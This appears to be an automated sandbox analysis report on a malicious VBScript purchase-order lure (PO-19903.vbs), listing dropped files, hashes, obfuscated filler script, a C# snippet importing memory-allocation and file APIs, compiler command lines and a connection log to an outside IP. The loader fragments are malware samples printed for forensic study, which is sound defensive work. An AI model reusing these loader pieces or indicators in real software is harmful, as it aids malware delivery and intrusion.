                                              Category:dropped
                                              Size (bytes):58346
                                              Entropy (8bit):7.3707309060250985
                                              Encrypted:false
                                              SSDEEP:1536:AHSjdJI/K9uq1GJgLYfRAD4vrtQ4FSaPY:Ayjd+C9+gLYfRADY/PY
                                              MD5:3960608F68EE07EDD764386B0A59DEA7
                                              SHA1:320B86E6D9D4514995C76B8E3C48A40F005C61AD
                                              SHA-256:644C64DED01C16C00CBA0FA07DD55A59D9A55DBB870519E09CA986FD5FE9DCDB
                                              SHA-512:9B6E9946A686AA0A37DEE812DF47521D7FB1A44AAAAD6346B842BE45E729536837ABAA24DD9E2E449FC6A8B0C9E76650104F942B2BE94E1850F28BEFE55CEDD8
                                              Malicious:false
                                              Preview:......hl....$.3...4$Z.q.Z.._1..4..E?.@@@@9.u.W.......).>..:mj.1L.12..K\...H......5.....9mg..XF .Z.{s.:..A...M~./....g[.....y....z...CF.@]...{(.....p.l.o..5.$.B..J..d....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..D.@.V.K...H..,1..w.....d.1..7u.u2....."..~ .G..R.8e...pbq...r.s[._'_.8E.....`H..<x|........x.&.C.UPd.6..O..A8...3....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..}.u%.C......Y..W.u}...?......[..A....5.;..J..A....E..=D......y3#.&.}...#..E......%..s..E?..E....M......E?s..Yy.y......($.....u...}..lP1.y..?l+i.....>.I...*(...+..["<.-..HR.t2G.......N..80.y...X.E.iSD?...|<.0y./?.....YM.....EA.OO...>....A.....mwU.>....@.E....h...A..|K.#F..."(......u.m..A... m.........rE?.=.4.E?.e.?.....E?u...i.G?...U.@.j.u.?....+.E...M....Y...K..q"..K.......{...s.1.Sc..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                              Category:dropped
                                              Size (bytes):1336
                                              Entropy (8bit):3.9832564748020243
                                              Encrypted:false
                                              SSDEEP:24:H+m9036o/hHIQwKTFpmfwI+ycuZhNjakSVPNnqSSd:c35ho/KTzmo1ulja3PqSC
                                              MD5:0D697A4FED65CC871D02BE886114CFC2
                                              SHA1:C54DCA05D9B3868AA802D8CC21295D6BE3D3CB19
                                              SHA-256:496C3CE0435E6305C01FC2A8D922559FFD9201AEDE442AC43219F5FB0C02B1FC
                                              SHA-512:6EF62E32ED330C055A0D8F9E48974C91EC5B57560E8EB5DAD227BEED7F361EBEDF703B158BB88ACD8479EABA1249930F2928C740182C5E38950B30E72252F19F
                                              Malicious:false
                                              Preview:L.....}b.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP..................x..rj."q.tb.B.............5.......C:\Users\user\AppData\Local\Temp\RES41DC.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                              Process:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):254965
                                              Entropy (8bit):4.46336089583053
                                              Encrypted:false
                                              SSDEEP:3072:kB1TObln3C9iLn6hzlUPI/aGVBUWcnRhjUo7M:kvObt3C9iL6hzlUPIDVBUWURhIJ
                                              MD5:A962843D9B6CF48DE8842547FB106D97
                                              SHA1:811BF42C5C506C5F8CC8D960A09BE77BAE937091
                                              SHA-256:274A94BE594E05BE571E43C8199840D18F8FFC1FB03D938A45A8A9DC2590B2F8
                                              SHA-512:ABDE20C506F95F27E2AAD393985DFF70AD8E5DA25E5B1535CA50614E86EF065ECA7342A95C95CDE284BED4BD06B68F65FE9E8A56702517698E7D739D5CF836CA
                                              Malicious:false
                                              Preview:'Superstim rukansbu DISPASS Justitsr3 FISKERIT takker SAPREMIAS Elim6 sedgese FILTRE ..'Gyra unhu Forraa3 FOROMTALCH sawniere metageo Inoffenciv8 Automato REFELGULD ANAPHYLAC julepsundi okse aitch Caro3 Nounlessv4 LYDEFRIT UNSOMBRENE KERATOM OVERPOSTIN Toleranc Skov9 Konf VIRTUALIZE barbadiers dogme ..'HOLOGRAPHI Psycho glumpyprae Humlebaeko Seriefrems8 Nedsla ATTA FRIKASSST Redundan Arationi2 storak Forbunds5 Solkurven5 GGEB Turdinae7 mexic Repr1 lege guidonian Nonp frdigb ombudenea amarante SLUTMRKER Fernissend7 STATS FLINGB SORTE SIGATOK Bazookaman6 Phosph1 Renummer ..'Unsen7 Kont1 ekspo Udstd9 Rnnebrtemp Authe Afkort Unbusi node NAILM Alcaide5 potpielabr ..'Hagaritev SPADENDUBL kraterssto farmerb Nete6 Trogonoi Bdepraksis Effektersb Quietest Ceragotyde8 Pinfea3 Betonerdi Biolysi griff carbone STROLLE Concrfsc4 denns flectmanz Typete unmistaked Polyd Mniot9 Adstad smuldets Omklamrin Tube1 Featfolk4 ..'Admiredto6 protokols neutr HULHED Cath Efterret Ritraads1 nucleo Holocepha1 RAMBES
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.085355193520012
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqVPN5Dlq5J:+RI+ycuZhNjakSVPNnqX
                                              MD5:789FC0726AD32271CC7462EB4284EDD1
                                              SHA1:6084EAA226A2190952393E6D6C32FC34D43D379E
                                              SHA-256:49429559E5B60B3EDA94ECC4160A7C0EF04FE2B967F63A81C9F44F9563C59C58
                                              SHA-512:6D1FB19C11B84F3E06F7871856D8B96B206FB18643494A381811A4C3F649188BD6FE367FAB79A64AB2109BE22C97246997C06E399CBC519AE50BE0EA541E14A2
                                              Malicious:false
                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):889
                                              Entropy (8bit):5.191875284747735
                                              Encrypted:false
                                              SSDEEP:24:JoVSAJt2mRmgkr7NJt29L81RfdafHNQRARU1uRihWRIM:JoVSAJtFmhr7NJtU0RoFQRARbRi4RIM
                                              MD5:EBEF46122B08728A01A250DF520357D7
                                              SHA1:D5DB4A89DA7DE1804EF133F7D81D56523044DA4C
                                              SHA-256:65013DE37A743262C3BEB05B409081A5CA852B93F72CA8CB70C83AAB0CE09F7C
                                              SHA-512:B81F4DDD72DD4F85AC5E0A0B9D7CBF148D834A89BAF9F4E9AAE8A1116D82E802A95F7FF3EE069500031650D4CFACA0F099DE92791B3E64D82299F39F4D89FAB8
                                              Malicious:false
                                              Preview:.using System;..using System.Runtime.InteropServices;..public static class Forly91..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int Forly96,ref Int32 rustninger,int Pointsmenh,ref Int32 Forly9,int WORKSHIPME,int Forly97);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Pointsmenh0,uint Pointsmenh1,IntPtr Pointsmenh2,ref Int32 Pointsmenh3,int Pointsmenh4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Pointsmenh5,int Pointsmenh6);....}
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):371
                                              Entropy (8bit):5.195659144967975
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23feVU+zxs7+AEszICN23feVun:p37Lvkmb6KmCU+WZE7Cun
                                              MD5:25C1DEA17960CAAC0387294B7B09B27C
                                              SHA1:61671246D0E746A051BCFB22703403FD732C633F
                                              SHA-256:65891E3CBB8205A583A1D3496AE355DB0D6C87293EECC6852AC09628C773DE6C
                                              SHA-512:A613E36971BCABF8D247D06BF0696B0ECD39EECFEE543D37E5B588E6A919E34ACB20DE944A87E39CF12E7B16E40A2084B6236E30D0B810F0B2705EAF0B75171F
                                              Malicious:false
                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.0.cs"
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):3584
                                              Entropy (8bit):3.275074049097374
                                              Encrypted:false
                                              SSDEEP:24:etGSTENIjzSJ14jyQS8VwIGFkVkQAzEZp5kjAhbvZtkZf3H4QbfWI+ycuZhNjakn:61PS4jyMCkVktzE6jUoJ3tK1ulja3Pq
                                              MD5:096F9F5031157309DD27175D10A61229
                                              SHA1:4BBA95BF76B7D0A18F679A265ED01073424B5D20
                                              SHA-256:4928EC7341EF0634A82D3B34754CD59342A72B9C90ECA5810ED211A4BFB1786D
                                              SHA-512:7BDE2584137D136FC1750213958A1FF14216792C88DCD7D1CDB7C38E3509BD21B05D7A4C8DC227D21BDE2E5F325635AAFB609CF759FB4F47EE3FD26AF6F6E8F6
                                              Malicious:false
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}b...........!.................%... ...@....... ....................................@.................................p%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P .. ...........................................................BSJB............v4.0.30319......l.......#~..l...,...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................/.(.................~.....~.......................................... 6............ A............ F............ ^.!.......... c.+.......o.....u.....~.......................... ..o.....u.....~.........................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:modified
Size (bytes):870
Entropy (8bit):5.284396790491977
Encrypted:false
SSDEEP:24:KSqd3ka6KmH/E7yKax5DqBVKVrdFAMBJTH:dika6PH/E7yK2DcVKdBJj
MD5:6BE78BEEDA948F094B733CD40AE5BFA7
SHA1:1F043CE3260533211EAD482A960BA7CD3B921A2F
SHA-256:1082F9CE64C6337C4D66382B89E91535AF198943A86CBCDCD34E5EB7C84C0FDA
SHA-512:AC4BE9064F083C4D5DB899D686ED6F82D5A18E0083F2128944157B0BB8945C632093F761AE5562BC41F9BFADFEF37D6CCF79B8DD1FF23FD788AC2E39C57359A9
Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
File type:ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):4.507728980611977
TrID:
• Visual Basic Script (13500/0) 100.00%
File name:PO-19903.vbs
File size:256870
MD5:0347b27843d88f73fdcd4dadb95549ac
SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
SHA512:368c6f19dc73693acd0f8c2513489ecb65bc763a6536de22a5421c05aff613191cd51379086765447b74faf28179e1253f7166d85ad9344a7a4be4442f1b9669
SSDEEP:3072:UCZ+vnIxDSTz1EGYdx3VyZcd4B5RYe/aVPC1C:UCZ+vnWOtPYdLyDRYcaVqI
TLSH:A544769245B1AFC8D1F839DFCB0D8620B2009D99A2D7F54C9AE211BD7FC72DA531B294
File Content Preview:'Leaveni MIDLET ABSENTEREN TITTERE Stningssek SMDES SOCIOECON Afgjortele gaidropsar Undenize4 FORR ..'FLISEB kogasinu VALMUER Repac2 RESTA HYPERTRO Facittets6 forespoer Deklarer MATRAL Vier Epigraphe CAPRYLYLF Fintll3 EKSPE Duode Kakkelovn Netdriverw skry
Icon Hash:e8d69ece869a9ec4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2022 14:01:30.924190998 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:30.924276114 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:30.924489975 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:30.973346949 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:30.973366976 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:31.730143070 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:31.730442047 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:31.854789972 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:31.854855061 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:31.855555058 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:31.855719090 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:31.861512899 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:31.902643919 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.121182919 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.121321917 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.121403933 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.121460915 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.121536970 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.121731997 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.121787071 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122005939 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.122160912 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122220039 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122397900 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122452021 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.122550011 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.122776985 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122811079 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122826099 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122839928 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.122853994 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.123212099 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.123460054 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.123744965 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.123963118 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.124126911 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.124381065 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.124589920 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.124772072 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.368755102 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.368793011 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.369030952 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.369318962 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.369486094 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.369673967 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.369816065 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.370001078 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.370069027 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.370403051 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.370778084 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.370806932 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.371145010 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.371299982 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.371464968 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.371814013 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.372042894 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.372473001 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.372736931 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.372853041 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.373466015 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.373778105 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.373831987 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.616535902 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.616554976 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.616723061 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.616909981 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.617022038 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.617163897 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.617264032 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.617466927 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.617640972 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.617764950 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.618072033 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.618215084 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.618221045 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.618444920 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.618472099 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.618551016 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.618733883 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.618752003 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.618769884 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.618894100 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.618925095 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.618989944 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619012117 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.619182110 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619213104 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.619249105 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619271040 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.619446993 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619462967 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619489908 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619532108 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.619555950 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619577885 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.619738102 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.619867086 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620026112 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620049000 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620055914 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620158911 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620240927 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620352030 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620373964 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620467901 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620481014 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620542049 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620659113 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620678902 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620851994 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620879889 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.620889902 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620917082 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.620934010 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621146917 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621159077 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.621176004 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.621191978 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621417999 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.621444941 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621480942 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.621490002 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621675968 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.621687889 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621692896 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.621701002 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.621982098 CEST | 49738 | 443 | 192.168.11.20 | 148.66.138.165
May 12, 2022 14:01:32.865366936 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.865392923 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
May 12, 2022 14:01:32.865540028 CEST | 443 | 49738 | 148.66.138.165 | 192.168.11.20
